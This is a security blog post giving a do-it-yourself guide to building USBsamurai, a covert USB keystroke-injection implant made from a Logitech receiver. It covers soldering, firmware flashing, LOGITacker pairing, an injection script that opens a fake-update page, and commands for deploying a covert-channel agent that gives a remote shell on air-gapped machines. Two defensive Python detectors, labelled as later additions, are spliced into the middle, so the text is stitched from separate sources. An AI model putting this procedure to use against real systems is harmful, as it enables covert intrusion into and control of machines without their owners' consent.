USBsamurai for Dummies: How To Make a Malicious USB Implant & Bypass Air-Gapped Environments for 10$. The Dumb-Proof Guide.

Pierluigi Paganini September 26, 2019

The popular researcher Luca Bongiorni described how to make a malicious USB implant (USBsamurai) that allows bypassing air-gapped environments for $10.

In the previous post, I talked a bit about USBsamurai based on the C-U0007.

With this article I want to shed more light on:

  • The differences between the C-U0007 and the C-U0012
  • How to build USBsamurai with a C-U0012
  • How to flash the C-U0012 with the LIGHTSPEED firmware
  • How to flash the C-U0007 with the G700 firmware to achieve better performance and get the Air-Gap Bypass feature
  • How to set up LOGITacker

Let’s get started!

Differences between C-U0007 & C-U0012:

As you can see below, they differ quite a bit from an aesthetic point of view. Moreover, the C-U0007 mounts a Nordic chipset and the C-U0012 a TI chipset. This will matter when it comes to picking the best hardware for building USBsamurai.

[photos: the C-U0007 and C-U0012 dongles side by side]

How to Flash the C-U0007 with the G700 firmware to achieve better performances and get the Air-Gap Bypass feature:

First of all, why do we need to flash the G700 firmware on the C-U0007?

Simple: for keystroke injection, the receiver model matters, because typing speed depends on it. With a stock Unifying receiver (i.e. C-U0007), typing out the Air-Gap Bypass client takes approx. 2 minutes, which, despite being typed in a stealthy way, is not optimal.

For Unifying receivers with a Nordic chipset (i.e. C-U0007), this can be reduced to 30 seconds if the G700 firmware is used, but injection is always unencrypted* (meaning anybody else could inject too, since G700 accepts plaintext injection).

*If you want more privacy while injecting payloads, I recommend the slightly more expensive C-U0012, which has encryption enabled.

How can we improve the C-U0007's speed?
You need to buy an old G700 mouse, dump its firmware with munifying, and then flash all the C-U0007 dongles you want. Luckily, I happen to have a G700 firmware available HERE. 🙂 See below for the detailed instructions.

As for TI receivers (i.e. C-U0008/C-U0012), typing speed can also be reduced to 30 seconds with a LIGHTSPEED firmware. Where do you get the LIGHTSPEED firmware? Either from Logitech's GitHub or HERE. This will be discussed in detail later in this article.

How to Build USBsamurai with a C-U0012

IMPORTANT! Before starting, be sure you know what you are doing and have all your tools at hand!

[photo: the tools needed for the build]

The process is rather simple:

  • Patiently open the USB dongle and extract the PCB with the antenna.
  • Open the USB cable** without destroying it. Use a scalpel to help you.
  • Slightly cut the white plastic of the USB male connector in order to expose its pins.
  • Add flux and tin those pins, and do the same to the pins on the C-U0012.
  • Solder everything together as in the images below, using some clamps if needed. Remember that the parts have to be soldered as close to each other as possible in order to fit back into the USB case! Check the measurements before soldering. DON'T RUSH the first time!

**I recommend trying with this cable; I built a few USBsamurai with it and it is quite easy to open with a scalpel. https://www.aliexpress.com/item/33052091501.html

[photos: the soldering steps and the assembled USBsamurai]

Congrats! Now you have your first USBsamurai based on C-U0012!

How to flash the C-U0012 with the LIGHTSPEED Firmware

Download the firmware either from Logitech's GitHub or HERE and use munifying to flash it onto the C-U0012 dongle!

[screenshots: flashing the LIGHTSPEED firmware with munifying]

With LIGHTSPEED, throughput is higher than with a normal Unifying firmware, and most importantly the covert channel is encrypted. Therefore LOGITacker needs to know its encryption key, which is obtained by pairing the C-U0012 dongle with LOGITacker itself.

Also remember that if you plan to use a USBsamurai based on the C-U0012, LOGITacker needs to run in LIGHTSPEED mode. You can set it with the commands shown below:

[screenshot: LOGITacker commands to switch the workmode to lightspeed]

Remember: if instead you want to use a C-U0007 with the G700 firmware, you will have to switch the operational mode back to g700:

[screenshot: LOGITacker commands to switch the workmode to g700]

How to Flash the C-U0007 with the G700 firmware to achieve better performances and get the Air-Gap Bypass feature

The flashing procedure is pretty simple:

  • Plug the C-U0007 dongle into the computer.
  • Download the G700 firmware available HERE.
  • Run “sudo ./munifying flash -r [C-U0007_G700]_RQR21.00_B0007_BOT01.02.B0014.bin”
  • Done! You are ready to pair your new USBsamurai with LOGITacker!

Reminder: LOGITacker needs to run in G700 mode (see the working modes in the LOGITacker setup section below).

If instead you want to use a C-U0012 with the LIGHTSPEED firmware, you will have to switch your LOGITacker's operational mode back to lightspeed.

How to setup LOGITacker

Here I need to split the topic into a few points, and I won't go that deep, since there is plenty of documentation in its GitHub repo.

First of all, I assume you have already flashed the latest release onto one of the compatible boards. [If you are updating to the latest release, after flashing it connect to LOGITacker via serial and issue the erase_flash command. Note that you may lose all your previous scripts and data.]

Working modes (this is mandatory to get everything working properly!!!):

  • For a USBsamurai based on the C-U0007 (w/ G700 fw) you need to set the LOGITacker workmode to g700.
  • For a USBsamurai based on the C-U0012 (w/ LIGHTSPEED fw) you need to set the LOGITacker workmode to lightspeed.

How to create a script and automatically load it at startup:

Simple: connect to LOGITacker over serial and type something like the following.

script press GUI r
script delay 500
script string iexplore -k http://fakeupdate.net/wnc/
script delay 200
script press RETURN
script store wannacry

Once it is saved in flash, try to load it again.

script load wannacry
script show

The following commands tell LOGITacker to use this payload as the default one for every injection.

options inject default-script wannacry
options store
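From the defender's side, the thing this script makes visible is the rhythm of injected input: a hotkey, a scripted pause, a whole command line typed at machine speed, another pause, RETURN. Human typing never sustains key-to-key intervals that short over a whole line. The following is an added example, not code from the original post or from LOGITacker, showing how an endpoint agent could flag such a burst from keystroke timestamps alone. The thresholds, the function names and the sample event stream are all assumptions constructed for illustration.

```python
from dataclasses import dataclass
from statistics import median
from typing import List, Tuple


@dataclass
class KeyEvent:
    t_ms: float  # timestamp of the key-down event, in milliseconds
    key: str     # a single character, or a named key such as "GUI+r" / "RETURN"


# Assumed thresholds (not from the original post): a human almost never keeps
# every interval under ~40 ms for 8 or more consecutive keys.
MIN_HUMAN_INTERVAL_MS = 40.0
MIN_BURST_KEYS = 8
BURST_GAP_MS = 300.0  # a pause longer than this ends a burst


def split_bursts(events: List[KeyEvent]) -> List[List[KeyEvent]]:
    """Group consecutive events into bursts separated by pauses > BURST_GAP_MS."""
    bursts: List[List[KeyEvent]] = []
    for ev in events:
        if bursts and ev.t_ms - bursts[-1][-1].t_ms <= BURST_GAP_MS:
            bursts[-1].append(ev)
        else:
            bursts.append([ev])
    return bursts


def is_injected(burst: List[KeyEvent]) -> bool:
    """A burst looks machine-generated if it is long and its median interval is sub-human."""
    if len(burst) < MIN_BURST_KEYS:
        return False
    intervals = [b.t_ms - a.t_ms for a, b in zip(burst, burst[1:])]
    return median(intervals) < MIN_HUMAN_INTERVAL_MS


def burst_text(burst: List[KeyEvent]) -> str:
    """Render the burst for an alert: characters as-is, named keys in angle brackets."""
    return "".join(ev.key if len(ev.key) == 1 else f"<{ev.key}>" for ev in burst)


def find_injection_bursts(events: List[KeyEvent]) -> List[Tuple[float, float, str]]:
    """Return (start_ms, median_interval_ms, text) for every suspicious burst."""
    hits = []
    for burst in split_bursts(events):
        if is_injected(burst):
            intervals = [b.t_ms - a.t_ms for a, b in zip(burst, burst[1:])]
            hits.append((burst[0].t_ms, median(intervals), burst_text(burst)))
    return hits


def make_human_typing(text: str, start_ms: float) -> List[KeyEvent]:
    """Constructed human-like input: deterministic intervals between 80 and 200 ms."""
    events, t = [], start_ms
    for i, ch in enumerate(text):
        events.append(KeyEvent(t, ch))
        t += 80 + (i * 37) % 121
    return events


def make_injected_typing(text: str, start_ms: float, interval_ms: float = 4.0) -> List[KeyEvent]:
    """Constructed scripted input: a fixed, sub-human interval per key."""
    return [KeyEvent(start_ms + i * interval_ms, ch) for i, ch in enumerate(text)]


# Constructed sample stream: a user types "hello world", then a scripted
# hotkey, 500 ms delay, a command line at 4 ms per key, 200 ms delay, RETURN
# (the same cadence as the script shown in the post; the text is a neutral stand-in).
INJECTED_LINE = "notepad example.txt"
SAMPLE_EVENTS = (
    make_human_typing("hello world", 0.0)
    + [KeyEvent(5000.0, "GUI+r")]
    + make_injected_typing(INJECTED_LINE, 5500.0)
    + [KeyEvent(5500.0 + 4.0 * len(INJECTED_LINE) + 200.0, "RETURN")]
)

if __name__ == "__main__":
    for start, med, text in find_injection_bursts(SAMPLE_EVENTS):
        print(f"ALERT t={start:.0f} ms median interval {med:.1f} ms: {text!r}")
```

The detector keys on timing only, so it cannot see the hotkey itself; what it catches is the line that follows. In practice the alert would be raised by the input-capturing component of an EDR agent, and the thresholds tuned against the organisation's own baseline of typing speed.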

How To Pair USBsamurai:

  • First, from your computer's terminal run “sudo ./munifying pair”
  • Then, from the LOGITacker console run “pair device run”
  • The pairing data (i.e. encryption keys) will be stored in LOGITacker's flash.

IMPORTANT!: Every time you turn on LOGITacker you will have to load from flash the pairing data of the specific USBsamurai you want to use. To do that, type the following command

devices storage load XX:XX:XX:XX:XX

and pick the address of that specific dongle. Of course you can load multiple USBsamurai!

How To Inject Payloads:

  • Set the proper workmode on LOGITacker, if not set yet (i.e. g700 or lightspeed).
  • Load a paired USBsamurai from flash, if not yet loaded (i.e. “devices storage load XX:XX:XX:XX:XX”).
  • Tell LOGITacker to use that specific USBsamurai (i.e. “inject target XX:XX:XX:XX:XX”).
  • Start payload injection at will with “inject execute”.
  • Profit.

How To Bypass an Air-Gapped Machine:

  • Set the proper workmode on LOGITacker, if not set yet (i.e. g700 or lightspeed).
  • Load a paired USBsamurai from flash, if not yet loaded (i.e. “devices storage load XX:XX:XX:XX:XX”).
  • First deploy the PoSH agent with “covert_channel deploy XX:XX:XX:XX:XX”.
  • Wait approx. 30 seconds for the agent to be fully injected.
  • Type “covert_channel connect XX:XX:XX:XX:XX”.
  • Voilà! You have your remote shell on an air-gapped machine!
  • NOTE: To exit the shell, type “!exit”.

Troubleshooting Tips

IMPORTANT!!! Be sure you have ONLY that Logitech dongle connected to your computer!! Otherwise, run a Kali VM and attach to it ONLY the C-U00xx you want to flash/pair!

Moreover, either set up all the software on a Kali VM (which is confirmed to run fine) or use sudo to run it on your preferred Linux OS.

Regarding munifying, I usually download it from GitHub, install golang and libusb, and then compile it with “go build”.

F.A.Q.

  • I am too dumb to build a USBsamurai myself. Do you sell it?

No. This is a DIY project and will stay that way. But... if you have a spare Bitcoin to give to some non-profit organization around the world, send me the proof of payment and I will make you a shiny USBsamurai!

  • Does the USB cable support data pass-through?

No. So far it cannot, though there are some hackish ways to accomplish it, for example by using an external NanoHub (https://www.smart-prototyping.com/NanoHub-tiny-USB-hub-for-hacking-projects).
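That answer is also the detection angle for defenders: whatever the cable looks like, what the host enumerates is a Logitech wireless receiver, not a storage or charging device, and on a machine where no wireless keyboard is expected that is a finding in itself. Here is an added example, not code from the original post or from any Logitech or LOGITacker tooling, that parses lsusb output and flags Logitech receivers. The Logitech vendor ID 046d and the Unifying receiver product ID c52b are real usb.ids entries; the post does not give the LIGHTSPEED receiver's ID, so the check also matches on the product description. The function names and the sample lsusb lines are constructed for this example.

```python
import re
import subprocess
from typing import Dict, List, Optional

# lsusb prints one device per line in this fixed shape.
LINE_RE = re.compile(r"^Bus (\d{3}) Device (\d{3}): ID ([0-9a-f]{4}):([0-9a-f]{4}) ?(.*)$")

LOGITECH_VID = "046d"
# c52b is the Unifying receiver (the C-U0007 in the post). Other receiver IDs are
# caught by the description match below; extend this set from your own inventory.
KNOWN_RECEIVER_PIDS = {"c52b"}


def parse_lsusb_line(line: str) -> Optional[Dict[str, str]]:
    """Split one lsusb line into its fields, or return None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    bus, dev, vid, pid, desc = m.groups()
    return {"bus": bus, "device": dev, "vid": vid, "pid": pid, "desc": desc}


def is_logitech_receiver(dev: Dict[str, str]) -> bool:
    """True for Logitech devices that are wireless receivers (by ID or by description)."""
    if dev["vid"] != LOGITECH_VID:
        return False
    return dev["pid"] in KNOWN_RECEIVER_PIDS or "receiver" in dev["desc"].lower()


def find_wireless_receivers(lines: List[str]) -> List[Dict[str, str]]:
    """Return every parsed lsusb entry that looks like a Logitech wireless receiver."""
    hits = []
    for line in lines:
        dev = parse_lsusb_line(line)
        if dev and is_logitech_receiver(dev):
            hits.append(dev)
    return hits


# Constructed sample output: a root hub, a wired Logitech mouse (must NOT be
# flagged), a USB flash drive, a Unifying receiver and a LIGHTSPEED-style receiver.
SAMPLE_LSUSB = [
    "Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub",
    "Bus 001 Device 004: ID 046d:c52b Logitech, Inc. Unifying Receiver",
    "Bus 001 Device 005: ID 046d:c077 Logitech, Inc. M105 Optical Mouse",
    "Bus 002 Device 003: ID 0781:5567 SanDisk Corp. Cruzer Blade",
    "Bus 001 Device 006: ID 046d:c539 Logitech, Inc. USB Receiver",
]


def live_lsusb_lines() -> List[str]:
    """Read the real device list if lsusb is installed; otherwise return nothing."""
    try:
        out = subprocess.check_output(["lsusb"], text=True)
    except (FileNotFoundError, subprocess.CalledProcessError):
        return []
    return out.splitlines()


if __name__ == "__main__":
    lines = live_lsusb_lines() or SAMPLE_LSUSB
    for d in find_wireless_receivers(lines):
        print(f"ALERT bus {d['bus']} dev {d['device']}: {d['vid']}:{d['pid']} {d['desc']}")
```

Run periodically (or from a udev add event), the same check turns a receiver that appears on a workstation where wireless input is prohibited into an alert. Pair it with a device allowlist so that approved receivers, identified by port or serial, are not reported every run.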

Of course, I couldn't conclude this article without thanking Marcus “LOGIhacker” Mengs (a.k.a. @mame82) for having created such amazing software and (especially) for having shared it with the community as FOSS!

About the author Luca Bongiorni:

Biography: Luca works as a Principal Offensive Security Engineer and in his spare time is involved in InfoSec, where his main fields of research are radio networks, hardware reverse engineering, hardware hacking, Internet of Things and physical security. He also loves to share his knowledge and present cool projects at security conferences around the globe. At the moment he is focusing his research on bypassing biometric access control systems, ICS security and air-gapped environments.
